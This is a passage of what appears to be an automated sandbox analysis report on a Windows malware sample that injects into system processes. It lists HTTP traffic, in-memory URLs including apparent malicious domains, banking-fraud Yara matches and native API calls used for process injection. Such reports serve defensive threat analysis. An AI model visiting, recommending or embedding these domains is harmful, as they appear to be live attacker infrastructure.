                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 20:32:06 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 503 Service Unavailable Server: nginx Date: Fri, 10 Jan 2025 20:37:02 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.25.3 Date: Fri, 10 Jan 2025 20:32:41 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Content-Encoding: gzip
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.25.3 Date: Fri, 10 Jan 2025 20:32:43 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Content-Encoding: gzip
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.25.3 Date: Fri, 10 Jan 2025 20:32:46 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Content-Encoding: gzip
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.25.3 Date: Fri, 10 Jan 2025 20:32:49 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 203 Connection: close Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /725g/ was not found on this server.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 20:33:21 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0 Pragma: no-cache cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UJGKmTvi9mSERkfB9QqwNfvbi062k1%2Biv%2FNV5ZTApW45axzlJyXsf9r2sFZ5veY3Lc84BO8Ew3PnP0YtV%2BZt3j8olQfD224uOVqH%2Bkagdv77RiXiirkqD%2BCrzq4PixsPvCN3Oz9KiM2U"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fff710ae8f68c0f-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1943&min_rtt=1943&rtt_var=971&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=762&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 20:33:23 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0 Pragma: no-cache cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LuMsGH8l6vFK5Eq5yYcRGuy9vgterHnfXiwBRh37xCprA3PUpkvOdmnnNd2yCwTdSSk8qzU1euq0fyuFabVRhKIYp%2BeMJJuLeJlcYGk1pJWhNBclo5JITK02%2BxtsalpHgfypGE9CNneF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fff711afe767d0e-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1980&min_rtt=1980&rtt_var=990&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=786&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: gsolWhsjddFW.exe, 00000009.00000002.4087823404.0000000005337000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.aziziyeescortg.xyz
                Source: gsolWhsjddFW.exe, 00000009.00000002.4087823404.0000000005337000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.aziziyeescortg.xyz/2pcx/
                Source: ieUnatt.exe, 00000008.00000003.2756546513.0000000008518000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: ieUnatt.exe, 00000008.00000002.4087201731.00000000067D4000.00000004.10000000.00040000.00000000.sdmp, gsolWhsjddFW.exe, 00000009.00000002.4085575768.0000000003EE4000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://assets.web.com/legal/English/MSA/v1.0.0.3/ServicesAgreement.pdf
                Source: ieUnatt.exe, 00000008.00000003.2756546513.0000000008518000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: ieUnatt.exe, 00000008.00000003.2756546513.0000000008518000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: ieUnatt.exe, 00000008.00000003.2756546513.0000000008518000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: ieUnatt.exe, 00000008.00000002.4087201731.00000000067D4000.00000004.10000000.00040000.00000000.sdmp, gsolWhsjddFW.exe, 00000009.00000002.4085575768.0000000003EE4000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://customerservice.web.com/prweb/PRAuth/app/WebKM_/JfLhd8LVz0a16-h3GqsHOCqqFky5N_vd
                Source: gsolWhsjddFW.exe, 00000009.00000002.4085575768.0000000003EE4000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://dts.gnpge.com
                Source: ieUnatt.exe, 00000008.00000003.2756546513.0000000008518000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: ieUnatt.exe, 00000008.00000003.2756546513.0000000008518000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: ieUnatt.exe, 00000008.00000003.2756546513.0000000008518000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: ieUnatt.exe, 00000008.00000002.4087201731.00000000067D4000.00000004.10000000.00040000.00000000.sdmp, gsolWhsjddFW.exe, 00000009.00000002.4085575768.0000000003EE4000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://euob.netgreencolumn.com/sxp/i/c4601e5f6cdd73216cafdd5af209201c.js
                Source: ieUnatt.exe, 00000008.00000003.2747721040.0000000003452000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4082613666.0000000003452000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2747721040.0000000003433000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4082613666.000000000342B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: ieUnatt.exe, 00000008.00000003.2747721040.0000000003433000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4082613666.000000000342B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: ieUnatt.exe, 00000008.00000003.2746207044.00000000084FE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: ieUnatt.exe, 00000008.00000003.2747721040.0000000003433000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4082613666.000000000342B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: ieUnatt.exe, 00000008.00000003.2747721040.0000000003452000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4082613666.0000000003452000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                Source: ieUnatt.exe, 00000008.00000003.2747721040.0000000003433000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033_s
                Source: ieUnatt.exe, 00000008.00000003.2747721040.0000000003433000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4082613666.000000000342B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033ku
                Source: ieUnatt.exe, 00000008.00000003.2747721040.0000000003433000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4082613666.000000000342B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: ieUnatt.exe, 00000008.00000003.2747721040.0000000003433000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4082613666.000000000342B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: ieUnatt.exe, 00000008.00000002.4087201731.0000000005E68000.00000004.10000000.00040000.00000000.sdmp, gsolWhsjddFW.exe, 00000009.00000002.4085575768.0000000003578000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://moneyeasilyijy.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==
                Source: ieUnatt.exe, 00000008.00000002.4087201731.0000000005E68000.00000004.10000000.00040000.00000000.sdmp, gsolWhsjddFW.exe, 00000009.00000002.4085575768.0000000003578000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://moneyeasilylso.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==
                Source: ieUnatt.exe, 00000008.00000002.4087201731.0000000005E68000.00000004.10000000.00040000.00000000.sdmp, gsolWhsjddFW.exe, 00000009.00000002.4085575768.0000000003578000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://moneyeasilysfl.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==
                Source: ieUnatt.exe, 00000008.00000002.4087201731.0000000005E68000.00000004.10000000.00040000.00000000.sdmp, gsolWhsjddFW.exe, 00000009.00000002.4085575768.0000000003578000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://moneyeasilyywe.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==
                Source: ieUnatt.exe, 00000008.00000003.2756546513.0000000008518000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
                Source: ieUnatt.exe, 00000008.00000003.2756546513.0000000008518000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: gsolWhsjddFW.exe, 00000009.00000002.4085575768.0000000003578000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.kkpmoneysocial.top
                Source: ieUnatt.exe, 00000008.00000002.4087201731.0000000005CD6000.00000004.10000000.00040000.00000000.sdmp, gsolWhsjddFW.exe, 00000009.00000002.4085575768.00000000033E6000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.muasamgiare.click/bsye/?bJMLqbS=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN
                Source: ieUnatt.exe, 00000008.00000002.4087201731.00000000067D4000.00000004.10000000.00040000.00000000.sdmp, gsolWhsjddFW.exe, 00000009.00000002.4085575768.0000000003EE4000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.networksolutions.com/

                E-Banking Fraud

                Source: Yara match File source: 5.2.NFhRxwbegd.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.NFhRxwbegd.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000008.00000002.4085031615.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000005.00000002.2561213396.0000000001830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000005.00000002.2560447934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000009.00000002.4087823404.00000000052A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000005.00000002.2562570319.00000000026F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000008.00000002.4085165315.0000000004F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_0042CCB3 NtClose,5_2_0042CCB3
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_01912B60 NtClose,LdrInitializeThunk,5_2_01912B60
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_01912DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_01912DF0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_01912C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_01912C70
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_019135C0 NtCreateMutant,LdrInitializeThunk,5_2_019135C0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_01914340 NtSetContextThread,5_2_01914340
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_01914650 NtSuspendThread,5_2_01914650
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_01912B80 NtQueryInformationFile,5_2_01912B80
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_01912BA0 NtEnumerateValueKey,5_2_01912BA0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_01912BF0 NtAllocateVirtualMemory,5_2_01912BF0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_01912BE0 NtQueryValueKey,5_2_01912BE0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_01912AB0 NtWaitForSingleObject,5_2_01912AB0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_01912AD0 NtReadFile,5_2_01912AD0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_01912AF0 NtWriteFile,5_2_01912AF0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_01912DB0 NtEnumerateKey,5_2_01912DB0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_01912DD0 NtDelayExecution,5_2_01912DD0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_01912D10 NtMapViewOfSection,5_2_01912D10
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_01912D00 NtSetInformationFile,5_2_01912D00
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_01912D30 NtUnmapViewOfSection,5_2_01912D30
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_01912CA0 NtQueryInformationToken,5_2_01912CA0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_01912CC0 NtQueryVirtualMemory,5_2_01912CC0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_01912CF0 NtOpenProcess,5_2_01912CF0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_01912C00 NtQueryInformationProcess,5_2_01912C00
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_01912C60 NtCreateKey,5_2_01912C60
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_01912F90 NtProtectVirtualMemory,5_2_01912F90
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_01912FB0 NtResumeThread,5_2_01912FB0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_01912FA0 NtQuerySection,5_2_01912FA0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_01912FE0 NtCreateFile,5_2_01912FE0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_01912F30 NtCreateSection,5_2_01912F30
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_01912F60 NtCreateProcessEx,5_2_01912F60
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_01912E80 NtReadVirtualMemory,5_2_01912E80
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_01912EA0 NtAdjustPrivilegesToken,5_2_01912EA0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_01912EE0 NtQueueApcThread,5_2_01912EE0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_01912E30 NtWriteVirtualMemory,5_2_01912E30
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_01913090 NtSetValueKey,5_2_01913090
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_01913010 NtOpenDirectoryObject,5_2_01913010
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_019139B0 NtGetContextThread,5_2_019139B0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_01913D10 NtOpenProcessToken,5_2_01913D10
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_01913D70 NtOpenThread,5_2_01913D70
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_050B4650 NtSuspendThread,LdrInitializeThunk,8_2_050B4650
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_050B4340 NtSetContextThread,LdrInitializeThunk,8_2_050B4340
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_050B2D10 NtMapViewOfSection,LdrInitializeThunk,8_2_050B2D10
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_050B2D30 NtUnmapViewOfSection,LdrInitializeThunk,8_2_050B2D30
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_050B2DD0 NtDelayExecution,LdrInitializeThunk,8_2_050B2DD0
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_050B2DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_050B2DF0
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_050B2C60 NtCreateKey,LdrInitializeThunk,8_2_050B2C60
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_050B2C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_050B2C70
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_050B2CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_050B2CA0
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_050B2F30 NtCreateSection,LdrInitializeThunk,8_2_050B2F30
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_050B2FB0 NtResumeThread,LdrInitializeThunk,8_2_050B2FB0
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_050B2FE0 NtCreateFile,LdrInitializeThunk,8_2_050B2FE0
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_050B2E80 NtReadVirtualMemory,LdrInitializeThunk,8_2_050B2E80
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_050B2EE0 NtQueueApcThread,LdrInitializeThunk,8_2_050B2EE0
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_050B2B60 NtClose,LdrInitializeThunk,8_2_050B2B60
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_050B2BA0 NtEnumerateValueKey,LdrInitializeThunk,8_2_050B2BA0
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_050B2BE0 NtQueryValueKey,LdrInitializeThunk,8_2_050B2BE0
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_050B2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_050B2BF0
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_050B2AD0 NtReadFile,LdrInitializeThunk,8_2_050B2AD0
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_050B2AF0 NtWriteFile,LdrInitializeThunk,8_2_050B2AF0
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_050B35C0 NtCreateMutant,LdrInitializeThunk,8_2_050B35C0
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_050B39B0 NtGetContextThread,LdrInitializeThunk,8_2_050B39B0
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_050B2D00 NtSetInformationFile,8_2_050B2D00
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_050B2DB0 NtEnumerateKey,8_2_050B2DB0
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_050B2C00 NtQueryInformationProcess,8_2_050B2C00
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_050B2CC0 NtQueryVirtualMemory,8_2_050B2CC0
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_050B2CF0 NtOpenProcess,8_2_050B2CF0
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_050B2F60 NtCreateProcessEx,8_2_050B2F60
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_050B2F90 NtProtectVirtualMemory,8_2_050B2F90
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_050B2FA0 NtQuerySection,8_2_050B2FA0
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_050B2E30 NtWriteVirtualMemory,8_2_050B2E30
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_050B2EA0 NtAdjustPrivilegesToken,8_2_050B2EA0
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_050B2B80 NtQueryInformationFile,8_2_050B2B80
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_050B2AB0 NtWaitForSingleObject,8_2_050B2AB0
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_050B3010 NtOpenDirectoryObject,8_2_050B3010
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_050B3090 NtSetValueKey,8_2_050B3090
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_050B3D10 NtOpenProcessToken,8_2_050B3D10
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_050B3D70 NtOpenThread,8_2_050B3D70
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_02F89A60 NtDeleteFile,8_2_02F89A60
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_02F89B00 NtClose,8_2_02F89B00
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_02F89810 NtCreateFile,8_2_02F89810
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_02F89970 NtReadFile,8_2_02F89970
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_02F89C50 NtAllocateVirtualMemory,8_2_02F89C50
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0513FF098_2_0513FF09
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_05081F928_2_05081F92
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0513FFB18_2_0513FFB1
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_05089EB08_2_05089EB0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_051159108_2_05115910
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050899508_2_05089950
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0509B9508_2_0509B950
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050ED8008_2_050ED800
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050838E08_2_050838E0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0513FB768_2_0513FB76
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0509FB808_2_0509FB80
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050BDBF98_2_050BDBF9
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050F5BF08_2_050F5BF0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_05137A468_2_05137A46
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0513FA498_2_0513FA49
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050F3A6C8_2_050F3A6C
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050C5AA08_2_050C5AA0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_05121AA38_2_05121AA3
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0511DAAC8_2_0511DAAC
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0512DAC68_2_0512DAC6
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02F723908_2_02F72390
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02F8C0A08_2_02F8C0A0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02F6D2C08_2_02F6D2C0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02F6D2B88_2_02F6D2B8
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02F6B6108_2_02F6B610
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02F6B6048_2_02F6B604
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02F6D4E08_2_02F6D4E0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02F6B4C08_2_02F6B4C0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02F75A408_2_02F75A40
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02F73BF98_2_02F73BF9
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02F73C408_2_02F73C40
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0539E4438_2_0539E443
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0539E7E18_2_0539E7E1
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0539E3288_2_0539E328
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0539D8A88_2_0539D8A8
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0539CB638_2_0539CB63
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: String function: 050EEA12 appears 86 times
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: String function: 050C7E54 appears 102 times
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: String function: 0506B970 appears 280 times
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: String function: 050B5130 appears 58 times
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: String function: 050FF290 appears 105 times
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: String function: 01915130 appears 58 times
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: String function: 0194EA12 appears 86 times
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: String function: 01927E54 appears 102 times
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: String function: 018CB970 appears 280 times
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: String function: 0195F290 appears 105 times
                Source: NFhRxwbegd.exe, 00000000.00000002.2390346855.0000000006B50000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs NFhRxwbegd.exe
                Source: NFhRxwbegd.exe, 00000000.00000002.2387344166.00000000037D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs NFhRxwbegd.exe
                Source: NFhRxwbegd.exe, 00000000.00000002.2391304053.000000000A090000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs NFhRxwbegd.exe
                Source: NFhRxwbegd.exe, 00000000.00000002.2384378545.000000000092E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs NFhRxwbegd.exe
